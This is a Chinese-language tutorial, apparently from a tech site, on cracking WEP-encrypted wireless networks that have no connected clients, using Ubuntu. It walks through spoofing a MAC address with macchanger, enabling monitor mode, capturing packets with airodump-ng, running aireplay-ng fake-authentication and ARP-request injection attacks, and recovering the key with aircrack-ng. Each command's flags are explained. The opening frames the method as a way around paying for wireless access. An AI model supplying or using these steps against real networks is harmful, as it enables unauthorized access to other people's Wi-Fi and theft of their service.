很多用户还在付费进行无线上网,为扩展大家思路及抛砖引玉,这里不再使用BackTrack2,而是使用另外一款也很受欢迎的操作系统Ubuntu作为无客户端无线WEP加密破解平台。
1.在图形界面中,打开一个Shell,如下图,
2.输入ifconfig -a 察看当前网卡
这里我就使用USB网卡为例,可以看到有一个名为rausb0的网卡,状态是未载入,这里先不要载入,先将MAC地址修改成需伪造的任意MAC地址,
3.输入macchanger –m 00:11:22:33:44:55 rausb0
-m后跟要伪造的MAC,之后再跟要修改的网卡名即可,这里我们将该USB网卡MAC修改成00:11:22:33:44:55
然后再载入网卡,输入:
ifconfig -a rausb0 up来载入USB网卡驱动
4.下来,我们可以使用如Kismet、Airosnort等工具来扫描当前无线网络的AP,
然后,我们需要将网卡激活成monitor模式,才可以进行后续的破解,命令如下:
airmon-ng start rausb0 3,这里这个3就是我们发现的AP的频道,然后输入下列命令开始抓包
airodump-ng -w test.cap --channel 3 rausb0 ,这里test.cap就是我设置的抓包文件名
5.下来,就可以进行FakeAuth攻击,这种攻击就是专门在预攻击无线接入点AP没有客户端活动甚至不存在Client的情况下使用的。具体命令如下:
- aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0
这里-1指的就是采用FakeAuth攻击模式,后面跟延迟;-e后面跟AP的ESSID,-a后面设置AP的MAC,-h后面则是前面伪造的MAC,最后是无线网卡。
6.与此同时,为了IVs(初始化向量)的获取,必须进行ArpRequest注入式攻击,这个很重要,可以有效提高抓包数量及破解速度,命令如下
- aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 rausb0
解释一下:-3指的是采取ArpRequest注入攻击方式,-b后面跟上要入侵的AP的MAC地址,-h后面跟的是监测到的客户端MAC地址,这里我们使用刚才伪造的客户端MAC,如上图中显示的,至于-x 1024指的是定义每秒发送数据包数量,这个值可以小一些,但最高1024就可以了,这里我使用默认,最后是指定USB无线网卡接下来,就可以同步开启 aircrack-ng来进行同步破解了,命令如下:
aircrack-ng -x -f 2 test-01.cap这里-x是暴力破解模式,-f指的是启用密码复杂度为2 ,后面是我们即时保存的那个抓包文件。
总结:
希望本文介绍的Ubuntu下无客户端无线WEP加密破解的方法能够对读者有所帮助,更多有关linux系统的知识还有待于读者去探索和学习。
【编辑推荐】